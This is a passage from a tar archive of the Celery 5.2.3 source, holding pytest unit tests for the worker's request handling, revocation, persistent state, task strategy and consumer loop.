= Mock(name='ack') job.on_success((False, 'foo', 1.0)) job.acknowledge.assert_not_called() def test_on_success__no_events(self): self.eventer = None job = self.zRequest(id=uuid()) job.send_event = Mock(name='send_event') job.on_success((False, 'foo', 1.0)) job.send_event.assert_not_called() def test_on_success__with_events(self): job = self.zRequest(id=uuid()) job.send_event = Mock(name='send_event') job.on_success((False, 'foo', 1.0)) job.send_event.assert_called_with( 'task-succeeded', result='foo', runtime=1.0, ) def test_execute_using_pool__revoked(self): tid = uuid() job = self.zRequest(id=tid, revoked_tasks={tid}) job.revoked = Mock() job.revoked.return_value = True with pytest.raises(TaskRevokedError): job.execute_using_pool(self.pool) def test_execute_using_pool__expired(self): tid = uuid() job = self.zRequest(id=tid, revoked_tasks=set()) job.expires = 1232133 job.revoked = Mock() job.revoked.return_value = True with pytest.raises(TaskRevokedError): job.execute_using_pool(self.pool) def test_execute_using_pool(self): weakref_ref = Mock(name='weakref.ref') job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref) job.execute_using_pool(self.pool) self.pool.apply_async.assert_called_with( trace_task_ret, args=(job.type, job.id, job.request_dict, job.body, job.content_type, job.content_encoding), accept_callback=job.on_accepted, timeout_callback=job.on_timeout, callback=job.on_success, error_callback=job.on_failure, soft_timeout=self.task.soft_time_limit, timeout=self.task.time_limit, correlation_id=job.id, ) assert job._apply_result weakref_ref.assert_called_with(self.pool.apply_async()) assert job._apply_result is weakref_ref() def test_execute_using_pool_with_use_fast_trace_task(self): self.app.use_fast_trace_task = True weakref_ref = Mock(name='weakref.ref') job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref) job.execute_using_pool(self.pool) self.pool.apply_async.assert_called_with( fast_trace_task, args=(job.type, job.id, job.request_dict, job.body, job.content_type, job.content_encoding), accept_callback=job.on_accepted, timeout_callback=job.on_timeout, callback=job.on_success, error_callback=job.on_failure, soft_timeout=self.task.soft_time_limit, timeout=self.task.time_limit, correlation_id=job.id, ) assert job._apply_result weakref_ref.assert_called_with(self.pool.apply_async()) assert job._apply_result is weakref_ref() def test_execute_using_pool_with_none_timelimit_header(self): weakref_ref = Mock(name='weakref.ref') job = self.zRequest(id=uuid(), revoked_tasks=set(), ref=weakref_ref, headers={'timelimit': None}) job.execute_using_pool(self.pool) self.pool.apply_async.assert_called_with( trace_task_ret, args=(job.type, job.id, job.request_dict, job.body, job.content_type, job.content_encoding), accept_callback=job.on_accepted, timeout_callback=job.on_timeout, callback=job.on_success, error_callback=job.on_failure, soft_timeout=self.task.soft_time_limit, timeout=self.task.time_limit, correlation_id=job.id, ) assert job._apply_result weakref_ref.assert_called_with(self.pool.apply_async()) assert job._apply_result is weakref_ref() def test_execute_using_pool__defaults_of_hybrid_to_proto2(self): weakref_ref = Mock(name='weakref.ref') headers = strategy.hybrid_to_proto2(Mock(headers=None), {'id': uuid(), 'task': self.mytask.name})[ 1] job = self.zRequest(revoked_tasks=set(), ref=weakref_ref, **headers) job.execute_using_pool(self.pool) assert job._apply_result weakref_ref.assert_called_with(self.pool.apply_async()) assert job._apply_result is weakref_ref() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_revoke.py0000664000175000017500000000035600000000000020340 0ustar00asifasif00000000000000from celery.worker import state class test_revoked: def test_is_working(self): state.revoked.add('foo') assert 'foo' in state.revoked state.revoked.pop_value('foo') assert 'foo' not in state.revoked ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_state.py0000664000175000017500000001222400000000000020162 0ustar00asifasif00000000000000import pickle from time import time from unittest.mock import Mock, patch import pytest from celery import uuid from celery.exceptions import WorkerShutdown, WorkerTerminate from celery.platforms import EX_OK from celery.utils.collections import LimitedSet from celery.worker import state @pytest.fixture def reset_state(): yield state.active_requests.clear() state.revoked.clear() state.total_count.clear() class MockShelve(dict): filename = None in_sync = False closed = False def open(self, filename, **kwargs): self.filename = filename return self def sync(self): self.in_sync = True def close(self): self.closed = True class MyPersistent(state.Persistent): storage = MockShelve() class test_maybe_shutdown: def teardown(self): state.should_stop = None state.should_terminate = None def test_should_stop(self): state.should_stop = True with pytest.raises(WorkerShutdown): state.maybe_shutdown() state.should_stop = 0 with pytest.raises(WorkerShutdown): state.maybe_shutdown() state.should_stop = False try: state.maybe_shutdown() except SystemExit: raise RuntimeError('should not have exited') state.should_stop = None try: state.maybe_shutdown() except SystemExit: raise RuntimeError('should not have exited') state.should_stop = 0 try: state.maybe_shutdown() except SystemExit as exc: assert exc.code == 0 else: raise RuntimeError('should have exited') state.should_stop = 303 try: state.maybe_shutdown() except SystemExit as exc: assert exc.code == 303 else: raise RuntimeError('should have exited') @pytest.mark.parametrize('should_stop', (None, False, True, EX_OK)) def test_should_terminate(self, should_stop): state.should_stop = should_stop state.should_terminate = True with pytest.raises(WorkerTerminate): state.maybe_shutdown() @pytest.mark.usefixtures('reset_state') class test_Persistent: @pytest.fixture def p(self): return MyPersistent(state, filename='celery-state') def test_close_twice(self, p): p._is_open = False p.close() def test_constructor(self, p): assert p.db == {} assert p.db.filename == p.filename def test_save(self, p): p.db['foo'] = 'bar' p.save() assert p.db.in_sync assert p.db.closed def add_revoked(self, p, *ids): for id in ids: p.db.setdefault('revoked', LimitedSet()).add(id) def test_merge(self, p, data=['foo', 'bar', 'baz']): state.revoked.update(data) p.merge() for item in data: assert item in state.revoked def test_merge_dict(self, p): p.clock = Mock() p.clock.adjust.return_value = 626 d = {'revoked': {'abc': time()}, 'clock': 313} p._merge_with(d) p.clock.adjust.assert_called_with(313) assert d['clock'] == 626 assert 'abc' in state.revoked def test_sync_clock_and_purge(self, p): passthrough = Mock() passthrough.side_effect = lambda x: x with patch('celery.worker.state.revoked') as revoked: d = {'clock': 0} p.clock = Mock() p.clock.forward.return_value = 627 p._dumps = passthrough p.compress = passthrough p._sync_with(d) revoked.purge.assert_called_with() assert d['clock'] == 627 assert 'revoked' not in d assert d['zrevoked'] is revoked def test_sync(self, p, data1=['foo', 'bar', 'baz'], data2=['baz', 'ini', 'koz']): self.add_revoked(p, *data1) for item in data2: state.revoked.add(item) p.sync() assert p.db['zrevoked'] pickled = p.decompress(p.db['zrevoked']) assert pickled saved = pickle.loads(pickled) for item in data2: assert item in saved class SimpleReq: def __init__(self, name): self.id = uuid() self.name = name @pytest.mark.usefixtures('reset_state') class test_state: def test_accepted(self, requests=[SimpleReq('foo'), SimpleReq('bar'), SimpleReq('baz'), SimpleReq('baz')]): for request in requests: state.task_accepted(request) for req in requests: assert req in state.active_requests assert state.total_count['foo'] == 1 assert state.total_count['bar'] == 1 assert state.total_count['baz'] == 2 def test_ready(self, requests=[SimpleReq('foo'), SimpleReq('bar')]): for request in requests: state.task_accepted(request) assert len(state.active_requests) == 2 for request in requests: state.task_ready(request) assert len(state.active_requests) == 0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/worker/test_strategy.py0000664000175000017500000002533000000000000020706 0ustar00asifasif00000000000000import logging from collections import defaultdict from contextlib import contextmanager from unittest.mock import ANY, Mock, patch import pytest from kombu.utils.limits import TokenBucket from celery import Task, signals from celery.app.trace import LOG_RECEIVED from celery.exceptions import InvalidTaskError from celery.utils.time import rate from celery.worker import state from celery.worker.request import Request from celery.worker.strategy import default as default_strategy from celery.worker.strategy import hybrid_to_proto2, proto1_to_proto2 class test_proto1_to_proto2: def setup(self): self.message = Mock(name='message') self.body = { 'args': (1,), 'kwargs': {'foo': 'baz'}, 'utc': False, 'taskset': '123', } def test_message_without_args(self): self.body.pop('args') body, _, _, _ = proto1_to_proto2(self.message, self.body) assert body[:2] == ((), {'foo': 'baz'}) def test_message_without_kwargs(self): self.body.pop('kwargs') body, _, _, _ = proto1_to_proto2(self.message, self.body) assert body[:2] == ((1,), {}) def test_message_kwargs_not_mapping(self): self.body['kwargs'] = (2,) with pytest.raises(InvalidTaskError): proto1_to_proto2(self.message, self.body) def test_message_no_taskset_id(self): self.body.pop('taskset') assert proto1_to_proto2(self.message, self.body) def test_message(self): body, headers, decoded, utc = proto1_to_proto2(self.message, self.body) assert body == ((1,), {'foo': 'baz'}, { 'callbacks': None, 'errbacks': None, 'chord': None, 'chain': None, }) assert headers == dict(self.body, group='123') assert decoded assert not utc class test_default_strategy_proto2: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add def get_message_class(self): return self.TaskMessage def prepare_message(self, message): return message class Context: def __init__(self, sig, s, reserved, consumer, message): self.sig = sig self.s = s self.reserved = reserved self.consumer = consumer self.message = message def __call__(self, callbacks=[], **kwargs): return self.s( self.message, (self.message.payload if not self.message.headers.get('id') else None), self.message.ack, self.message.reject, callbacks, **kwargs ) def was_reserved(self): return self.reserved.called def was_rate_limited(self): assert not self.was_reserved() return self.consumer._limit_task.called def was_limited_with_eta(self): assert not self.was_reserved() called = self.consumer.timer.call_at.called if called: assert self.consumer.timer.call_at.call_args[0][1] == \ self.consumer._limit_post_eta return called def was_scheduled(self): assert not self.was_reserved() assert not self.was_rate_limited() return self.consumer.timer.call_at.called def event_sent(self): return self.consumer.event_dispatcher.send.call_args def get_request(self): if self.was_reserved(): return self.reserved.call_args[0][0] if self.was_rate_limited(): return self.consumer._limit_task.call_args[0][0] if self.was_scheduled(): return self.consumer.timer.call_at.call_args[0][0] raise ValueError('request not handled') @contextmanager def _context(self, sig, rate_limits=True, events=True, utc=True, limit=None): assert sig.type.Strategy assert sig.type.Request reserved = Mock() consumer = Mock() consumer.task_buckets = defaultdict(lambda: None) if limit: bucket = TokenBucket(rate(limit), capacity=1) consumer.task_buckets[sig.task] = bucket consumer.controller.state.revoked = set() consumer.disable_rate_limits = not rate_limits consumer.event_dispatcher.enabled = events s = sig.type.start_strategy(self.app, consumer, task_reserved=reserved) assert s message = self.task_message_from_sig( self.app, sig, utc=utc, TaskMessage=self.get_message_class(), ) message = self.prepare_message(message) yield self.Context(sig, s, reserved, consumer, message) def test_when_logging_disabled(self, caplog): # Capture logs at any level above `NOTSET` caplog.set_level(logging.NOTSET + 1, logger="celery.worker.strategy") with patch('celery.worker.strategy.logger') as logger: logger.isEnabledFor.return_value = False with self._context(self.add.s(2, 2)) as C: C() assert not caplog.records def test_task_strategy(self): with self._context(self.add.s(2, 2)) as C: C() assert C.was_reserved() req = C.get_request() C.consumer.on_task_request.assert_called_with(req) assert C.event_sent() def test_callbacks(self): with self._context(self.add.s(2, 2)) as C: callbacks = [Mock(name='cb1'), Mock(name='cb2')] C(callbacks=callbacks) req = C.get_request() for callback in callbacks: callback.assert_called_with(req) def test_log_task_received(self, caplog): caplog.set_level(logging.INFO, logger="celery.worker.strategy") with self._context(self.add.s(2, 2)) as C: C() for record in caplog.records: if record.msg == LOG_RECEIVED: assert record.levelno == logging.INFO break else: raise ValueError("Expected message not in captured log records") def test_log_task_received_custom(self, caplog): caplog.set_level(logging.INFO, logger="celery.worker.strategy") custom_fmt = "CUSTOM MESSAGE" with self._context( self.add.s(2, 2) ) as C, patch( "celery.app.trace.LOG_RECEIVED", new=custom_fmt, ): C() for record in caplog.records: if record.msg == custom_fmt: assert set(record.args) == {"id", "name", "kwargs", "args"} break else: raise ValueError("Expected message not in captured log records") def test_signal_task_received(self): callback = Mock() with self._context(self.add.s(2, 2)) as C: signals.task_received.connect(callback) C() callback.assert_called_once_with(sender=C.consumer, request=ANY, signal=signals.task_received) def test_when_events_disabled(self): with self._context(self.add.s(2, 2), events=False) as C: C() assert C.was_reserved() assert not C.event_sent() def test_eta_task(self): with self._context(self.add.s(2, 2).set(countdown=10)) as C: C() assert C.was_scheduled() C.consumer.qos.increment_eventually.assert_called_with() def test_eta_task_utc_disabled(self): with self._context(self.add.s(2, 2).set(countdown=10), utc=False) as C: C() assert C.was_scheduled() C.consumer.qos.increment_eventually.assert_called_with() def test_when_rate_limited(self): task = self.add.s(2, 2) with self._context(task, rate_limits=True, limit='1/m') as C: C() assert C.was_rate_limited() def test_when_rate_limited_with_eta(self): task = self.add.s(2, 2).set(countdown=10) with self._context(task, rate_limits=True, limit='1/m') as C: C() assert C.was_limited_with_eta() C.consumer.qos.increment_eventually.assert_called_with() def test_when_rate_limited__limits_disabled(self): task = self.add.s(2, 2) with self._context(task, rate_limits=False, limit='1/m') as C: C() assert C.was_reserved() def test_when_revoked(self): task = self.add.s(2, 2) task.freeze() try: with self._context(task) as C: C.consumer.controller.state.revoked.add(task.id) state.revoked.add(task.id) C() with pytest.raises(ValueError): C.get_request() finally: state.revoked.discard(task.id) class test_default_strategy_proto1(test_default_strategy_proto2): def get_message_class(self): return self.TaskMessage1 class test_default_strategy_proto1__no_utc(test_default_strategy_proto2): def get_message_class(self): return self.TaskMessage1 def prepare_message(self, message): message.payload['utc'] = False return message class test_custom_request_for_default_strategy(test_default_strategy_proto2): def test_custom_request_gets_instantiated(self): _MyRequest = Mock(name='MyRequest') class MyRequest(Request): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) _MyRequest() class MyTask(Task): Request = MyRequest @self.app.task(base=MyTask) def failed(): raise AssertionError sig = failed.s() with self._context(sig) as C: task_message_handler = default_strategy( failed, self.app, C.consumer ) task_message_handler(C.message, None, None, None, None) _MyRequest.assert_called() class test_hybrid_to_proto2: def setup(self): self.message = Mock(name='message', headers={"custom": "header"}) self.body = { 'args': (1,), 'kwargs': {'foo': 'baz'}, 'utc': False, 'taskset': '123', } def test_retries_default_value(self): _, headers, _, _ = hybrid_to_proto2(self.message, self.body) assert headers.get('retries') == 0 def test_retries_custom_value(self): _custom_value = 3 self.body['retries'] = _custom_value _, headers, _, _ = hybrid_to_proto2(self.message, self.body) assert headers.get('retries') == _custom_value def test_custom_headers(self): _, headers, _, _ = hybrid_to_proto2(self.message, self.body) assert headers.get("custom") == "header" ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_worker.py0000664000175000017500000011570400000000000020362 0ustar00asifasif00000000000000import os import socket import sys from collections import deque from datetime import datetime, timedelta from functools import partial from queue import Empty from queue import Queue as FastQueue from threading import Event from unittest.mock import Mock, patch import pytest from amqp import ChannelError from kombu import Connection from kombu.asynchronous import get_event_loop from kombu.common import QoS, ignore_errors from kombu.transport.base import Message from kombu.transport.memory import Transport from kombu.utils.uuid import uuid import t.skip from celery.bootsteps import CLOSE, RUN, TERMINATE, StartStopStep from celery.concurrency.base import BasePool from celery.exceptions import (ImproperlyConfigured, InvalidTaskError, TaskRevokedError, WorkerShutdown, WorkerTerminate) from celery.platforms import EX_FAILURE from celery.utils.nodenames import worker_direct from celery.utils.serialization import pickle from celery.utils.timer2 import Timer from celery.worker import autoscale, components, consumer, state from celery.worker import worker as worker_module from celery.worker.consumer import Consumer from celery.worker.pidbox import gPidbox from celery.worker.request import Request def MockStep(step=None): if step is None: step = Mock(name='step') else: step.blueprint = Mock(name='step.blueprint') step.blueprint.name = 'MockNS' step.name = f'MockStep({id(step)})' return step def mock_event_dispatcher(): evd = Mock(name='event_dispatcher') evd.groups = ['worker'] evd._outbound_buffer = deque() return evd def find_step(obj, typ): return obj.blueprint.steps[typ.name] def create_message(channel, **data): data.setdefault('id', uuid()) m = Message(body=pickle.dumps(dict(**data)), channel=channel, content_type='application/x-python-serialize', content_encoding='binary', delivery_info={'consumer_tag': 'mock'}) m.accept = ['application/x-python-serialize'] return m class ConsumerCase: def create_task_message(self, channel, *args, **kwargs): m = self.TaskMessage(*args, **kwargs) m.channel = channel m.delivery_info = {'consumer_tag': 'mock'} return m class test_Consumer(ConsumerCase): def setup(self): self.buffer = FastQueue() self.timer = Timer() @self.app.task(shared=False) def foo_task(x, y, z): return x * y * z self.foo_task = foo_task def teardown(self): self.timer.stop() def LoopConsumer(self, buffer=None, controller=None, timer=None, app=None, without_mingle=True, without_gossip=True, without_heartbeat=True, **kwargs): if controller is None: controller = Mock(name='.controller') buffer = buffer if buffer is not None else self.buffer.put timer = timer if timer is not None else self.timer app = app if app is not None else self.app c = Consumer( buffer, timer=timer, app=app, controller=controller, without_mingle=without_mingle, without_gossip=without_gossip, without_heartbeat=without_heartbeat, **kwargs ) c.task_consumer = Mock(name='.task_consumer') c.qos = QoS(c.task_consumer.qos, 10) c.connection = Mock(name='.connection') c.controller = c.app.WorkController() c.heart = Mock(name='.heart') c.controller.consumer = c c.pool = c.controller.pool = Mock(name='.controller.pool') c.node = Mock(name='.node') c.event_dispatcher = mock_event_dispatcher() return c def NoopConsumer(self, *args, **kwargs): c = self.LoopConsumer(*args, **kwargs) c.loop = Mock(name='.loop') return c def test_info(self): c = self.NoopConsumer() c.connection.info.return_value = {'foo': 'bar'} c.controller.pool.info.return_value = [Mock(), Mock()] info = c.controller.stats() assert info['prefetch_count'] == 10 assert info['broker'] def test_start_when_closed(self): c = self.NoopConsumer() c.blueprint.state = CLOSE c.start() def test_connection(self): c = self.NoopConsumer() c.blueprint.start(c) assert isinstance(c.connection, Connection) c.blueprint.state = RUN c.event_dispatcher = None c.blueprint.restart(c) assert c.connection c.blueprint.state = RUN c.shutdown() assert c.connection is None assert c.task_consumer is None c.blueprint.start(c) assert isinstance(c.connection, Connection) c.blueprint.restart(c) c.stop() c.shutdown() assert c.connection is None assert c.task_consumer is None def test_close_connection(self): c = self.NoopConsumer() c.blueprint.state = RUN step = find_step(c, consumer.Connection) connection = c.connection step.shutdown(c) connection.close.assert_called() assert c.connection is None def test_close_connection__heart_shutdown(self): c = self.NoopConsumer() event_dispatcher = c.event_dispatcher heart = c.heart c.event_dispatcher.enabled = True c.blueprint.state = RUN Events = find_step(c, consumer.Events) Events.shutdown(c) Heart = find_step(c, consumer.Heart) Heart.shutdown(c) event_dispatcher.close.assert_called() heart.stop.assert_called_with() @patch('celery.worker.consumer.consumer.warn') def test_receive_message_unknown(self, warn): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() channel = Mock(name='.channeol') m = create_message(channel, unknown={'baz': '!!!'}) callback = self._get_on_message(c) callback(m) warn.assert_called() @patch('celery.worker.strategy.to_timestamp') def test_receive_message_eta_OverflowError(self, to_timestamp): to_timestamp.side_effect = OverflowError() c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() m = self.create_task_message( Mock(), self.foo_task.name, args=('2, 2'), kwargs={}, eta=datetime.now().isoformat(), ) c.update_strategies() callback = self._get_on_message(c) callback(m) assert m.acknowledged @patch('celery.worker.consumer.consumer.error') def test_receive_message_InvalidTaskError(self, error): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() m = self.create_task_message( Mock(), self.foo_task.name, args=(1, 2), kwargs='foobarbaz', id=1) c.update_strategies() strat = c.strategies[self.foo_task.name] = Mock(name='strategy') strat.side_effect = InvalidTaskError() callback = self._get_on_message(c) callback(m) error.assert_called() assert 'Received invalid task message' in error.call_args[0][0] @patch('celery.worker.consumer.consumer.crit') def test_on_decode_error(self, crit): c = self.LoopConsumer() class MockMessage(Mock): content_type = 'application/x-msgpack' content_encoding = 'binary' body = 'foobarbaz' message = MockMessage() c.on_decode_error(message, KeyError('foo')) assert message.ack.call_count assert "Can't decode message body" in crit.call_args[0][0] def _get_on_message(self, c): if c.qos is None: c.qos = Mock() c.task_consumer = Mock() c.event_dispatcher = mock_event_dispatcher() c.connection = Mock(name='.connection') c.connection.get_heartbeat_interval.return_value = 0 c.connection.drain_events.side_effect = WorkerShutdown() with pytest.raises(WorkerShutdown): c.loop(*c.loop_args()) assert c.task_consumer.on_message return c.task_consumer.on_message def test_receieve_message(self): c = self.LoopConsumer() c.blueprint.state = RUN m = self.create_task_message( Mock(), self.foo_task.name, args=[2, 4, 8], kwargs={}, ) c.update_strategies() callback = self._get_on_message(c) callback(m) in_bucket = self.buffer.get_nowait() assert isinstance(in_bucket, Request) assert in_bucket.name == self.foo_task.name assert in_bucket.execute() == 2 * 4 * 8 assert self.timer.empty() def test_start_channel_error(self): def loop_side_effect(): yield KeyError('foo') yield SyntaxError('bar') c = self.NoopConsumer(task_events=False, pool=BasePool()) c.loop.side_effect = loop_side_effect() c.channel_errors = (KeyError,) try: with pytest.raises(KeyError): c.start() finally: c.timer and c.timer.stop() def test_start_connection_error(self): def loop_side_effect(): yield KeyError('foo') yield SyntaxError('bar') c = self.NoopConsumer(task_events=False, pool=BasePool()) c.loop.side_effect = loop_side_effect() c.connection_errors = (KeyError,) try: with pytest.raises(SyntaxError): c.start() finally: c.timer and c.timer.stop() def test_loop_ignores_socket_timeout(self): class Connection(self.app.connection_for_read().__class__): obj = None def drain_events(self, **kwargs): self.obj.connection = None raise socket.timeout(10) c = self.NoopConsumer() c.connection = Connection(self.app.conf.broker_url) c.connection.obj = c c.qos = QoS(c.task_consumer.qos, 10) c.loop(*c.loop_args()) def test_loop_when_socket_error(self): class Connection(self.app.connection_for_read().__class__): obj = None def drain_events(self, **kwargs): self.obj.connection = None raise OSError('foo') c = self.LoopConsumer() c.blueprint.state = RUN conn = c.connection = Connection(self.app.conf.broker_url) c.connection.obj = c c.qos = QoS(c.task_consumer.qos, 10) with pytest.raises(socket.error): c.loop(*c.loop_args()) c.blueprint.state = CLOSE c.connection = conn c.loop(*c.loop_args()) def test_loop(self): class Connection(self.app.connection_for_read().__class__): obj = None def drain_events(self, **kwargs): self.obj.connection = None @property def supports_heartbeats(self): return False c = self.LoopConsumer() c.blueprint.state = RUN c.connection = Connection(self.app.conf.broker_url) c.connection.obj = c c.connection.get_heartbeat_interval = Mock(return_value=None) c.qos = QoS(c.task_consumer.qos, 10) c.loop(*c.loop_args()) c.loop(*c.loop_args()) assert c.task_consumer.consume.call_count c.task_consumer.qos.assert_called_with(prefetch_count=10) assert c.qos.value == 10 c.qos.decrement_eventually() assert c.qos.value == 9 c.qos.update() assert c.qos.value == 9 c.task_consumer.qos.assert_called_with(prefetch_count=9) def test_ignore_errors(self): c = self.NoopConsumer() c.connection_errors = (AttributeError, KeyError,) c.channel_errors = (SyntaxError,) ignore_errors(c, Mock(side_effect=AttributeError('foo'))) ignore_errors(c, Mock(side_effect=KeyError('foo'))) ignore_errors(c, Mock(side_effect=SyntaxError('foo'))) with pytest.raises(IndexError): ignore_errors(c, Mock(side_effect=IndexError('foo'))) def test_apply_eta_task(self): c = self.NoopConsumer() c.qos = QoS(None, 10) task = Mock(name='task', id='1234213') qos = c.qos.value c.apply_eta_task(task) assert task in state.reserved_requests assert c.qos.value == qos - 1 assert self.buffer.get_nowait() is task def test_receieve_message_eta_isoformat(self): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() m = self.create_task_message( Mock(), self.foo_task.name, eta=(datetime.now() + timedelta(days=1)).isoformat(), args=[2, 4, 8], kwargs={}, ) c.qos = QoS(c.task_consumer.qos, 1) current_pcount = c.qos.value c.event_dispatcher.enabled = False c.update_strategies() callback = self._get_on_message(c) callback(m) c.timer.stop() c.timer.join(1) items = [entry[2] for entry in self.timer.queue] found = 0 for item in items: if item.args[0].name == self.foo_task.name: found = True assert found assert c.qos.value > current_pcount c.timer.stop() def test_pidbox_callback(self): c = self.NoopConsumer() con = find_step(c, consumer.Control).box con.node = Mock() con.reset = Mock() con.on_message('foo', 'bar') con.node.handle_message.assert_called_with('foo', 'bar') con.node = Mock() con.node.handle_message.side_effect = KeyError('foo') con.on_message('foo', 'bar') con.node.handle_message.assert_called_with('foo', 'bar') con.node = Mock() con.node.handle_message.side_effect = ValueError('foo') con.on_message('foo', 'bar') con.node.handle_message.assert_called_with('foo', 'bar') con.reset.assert_called() def test_revoke(self): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() channel = Mock(name='channel') id = uuid() t = self.create_task_message( channel, self.foo_task.name, args=[2, 4, 8], kwargs={}, id=id, ) state.revoked.add(id) callback = self._get_on_message(c) callback(t) assert self.buffer.empty() def test_receieve_message_not_registered(self): c = self.LoopConsumer() c.blueprint.state = RUN c.steps.pop() channel = Mock(name='channel') m = self.create_task_message( channel, 'x.X.31x', args=[2, 4, 8], kwargs={}, ) callback = self._get_on_message(c) assert not callback(m) with pytest.raises(Empty): self.buffer.get_nowait() assert self.timer.empty() @patch('celery.worker.consumer.consumer.warn') @patch('celery.worker.consumer.consumer.logger') def test_receieve_message_ack_raises(self, logger, warn): c = self.LoopConsumer() c.blueprint.state = RUN channel = Mock(name='channel') m = self.create_task_message( channel, self.foo_task.name, args=[2, 4, 8], kwargs={}, ) m.headers = None c.update_strategies() c.connection_errors = (socket.error,) m.reject = Mock() m.reject.side_effect = socket.error('foo') callback = self._get_on_message(c) assert not callback(m) warn.assert_called() with pytest.raises(Empty): self.buffer.get_nowait() assert self.timer.empty() m.reject_log_error.assert_called_with(logger, c.connection_errors) def test_receive_message_eta(self): if os.environ.get('C_DEBUG_TEST'): pp = partial(print, file=sys.__stderr__) else: def pp(*args, **kwargs): pass pp('TEST RECEIVE MESSAGE ETA') pp('+CREATE MYKOMBUCONSUMER') c = self.LoopConsumer() pp('-CREATE MYKOMBUCONSUMER') c.steps.pop() channel = Mock(name='channel') pp('+ CREATE MESSAGE') m = self.create_task_message( channel, self.foo_task.name, args=[2, 4, 8], kwargs={}, eta=(datetime.now() + timedelta(days=1)).isoformat(), ) pp('- CREATE MESSAGE') try: pp('+ BLUEPRINT START 1') c.blueprint.start(c) pp('- BLUEPRINT START 1') p = c.app.conf.broker_connection_retry c.app.conf.broker_connection_retry = False pp('+ BLUEPRINT START 2') c.blueprint.start(c) pp('- BLUEPRINT START 2') c.app.conf.broker_connection_retry = p pp('+ BLUEPRINT RESTART') c.blueprint.restart(c) pp('- BLUEPRINT RESTART') pp('+ GET ON MESSAGE') callback = self._get_on_message(c) pp('- GET ON MESSAGE') pp('+ CALLBACK') callback(m) pp('- CALLBACK') finally: pp('+ STOP TIMER') c.timer.stop() pp('- STOP TIMER') try: pp('+ JOIN TIMER') c.timer.join() pp('- JOIN TIMER') except RuntimeError: pass in_hold = c.timer.queue[0] assert len(in_hold) == 3 eta, priority, entry = in_hold task = entry.args[0] assert isinstance(task, Request) assert task.name == self.foo_task.name assert task.execute() == 2 * 4 * 8 with pytest.raises(Empty): self.buffer.get_nowait() def test_reset_pidbox_node(self): c = self.NoopConsumer() con = find_step(c, consumer.Control).box con.node = Mock() chan = con.node.channel = Mock() chan.close.side_effect = socket.error('foo') c.connection_errors = (socket.error,) con.reset() chan.close.assert_called_with() def test_reset_pidbox_node_green(self): c = self.NoopConsumer(pool=Mock(is_green=True)) con = find_step(c, consumer.Control) assert isinstance(con.box, gPidbox) con.start(c) c.pool.spawn_n.assert_called_with(con.box.loop, c) def test_green_pidbox_node(self): pool = Mock() pool.is_green = True c = self.NoopConsumer(pool=Mock(is_green=True)) controller = find_step(c, consumer.Control) class BConsumer(Mock): def __enter__(self): self.consume() return self def __exit__(self, *exc_info): self.cancel() controller.box.node.listen = BConsumer() connections = [] class Connection: calls = 0 def __init__(self, obj): connections.append(self) self.obj = obj self.default_channel = self.channel() self.closed = False def __enter__(self): return self def __exit__(self, *exc_info): self.close() def channel(self): return Mock() def as_uri(self): return 'dummy://' def drain_events(self, **kwargs): if not self.calls: self.calls += 1 raise socket.timeout() self.obj.connection = None controller.box._node_shutdown.set() def close(self): self.closed = True c.connection_for_read = lambda: Connection(obj=c) controller = find_step(c, consumer.Control) controller.box.loop(c) controller.box.node.listen.assert_called() assert controller.box.consumer controller.box.consumer.consume.assert_called_with() assert c.connection is None assert connections[0].closed @patch('kombu.connection.Connection._establish_connection') @patch('kombu.utils.functional.sleep') def test_connect_errback(self, sleep, connect): def connect_side_effect(): yield Mock() while True: yield ChannelError('error') c = self.NoopConsumer() Transport.connection_errors = (ChannelError,) connect.side_effect = connect_side_effect() c.connect() connect.assert_called_with() def test_stop_pidbox_node(self): c = self.NoopConsumer() cont = find_step(c, consumer.Control) cont._node_stopped = Event() cont._node_shutdown = Event() cont._node_stopped.set() cont.stop(c) def test_start__loop(self): class _QoS: prev = 3 value = 4 def update(self): self.prev = self.value init_callback = Mock(name='init_callback') c = self.NoopConsumer(init_callback=init_callback) c.qos = _QoS() c.connection = Connection(self.app.conf.broker_url) c.connection.get_heartbeat_interval = Mock(return_value=None) c.iterations = 0 def raises_KeyError(*args, **kwargs): c.iterations += 1 if c.qos.prev != c.qos.value: c.qos.update() if c.iterations >= 2: raise KeyError('foo') c.loop = raises_KeyError with pytest.raises(KeyError): c.start() assert c.iterations == 2 assert c.qos.prev == c.qos.value init_callback.reset_mock() c = self.NoopConsumer(task_events=False, init_callback=init_callback) c.qos = _QoS() c.connection = Connection(self.app.conf.broker_url) c.connection.get_heartbeat_interval = Mock(return_value=None) c.loop = Mock(side_effect=socket.error('foo')) with pytest.raises(socket.error): c.start() c.loop.assert_called() def test_reset_connection_with_no_node(self): c = self.NoopConsumer() c.steps.pop() c.blueprint.start(c) class test_WorkController(ConsumerCase): def setup(self): self.worker = self.create_worker() self._logger = worker_module.logger self._comp_logger = components.logger self.logger = worker_module.logger = Mock() self.comp_logger = components.logger = Mock() @self.app.task(shared=False) def foo_task(x, y, z): return x * y * z self.foo_task = foo_task def teardown(self): worker_module.logger = self._logger components.logger = self._comp_logger def create_worker(self, **kw): worker = self.app.WorkController(concurrency=1, loglevel=0, **kw) worker.blueprint.shutdown_complete.set() return worker def test_on_consumer_ready(self): self.worker.on_consumer_ready(Mock()) def test_setup_queues_worker_direct(self): self.app.conf.worker_direct = True self.app.amqp.__dict__['queues'] = Mock() self.worker.setup_queues({}) self.app.amqp.queues.select_add.assert_called_with( worker_direct(self.worker.hostname), ) def test_setup_queues__missing_queue(self): self.app.amqp.queues.select = Mock(name='select') self.app.amqp.queues.deselect = Mock(name='deselect') 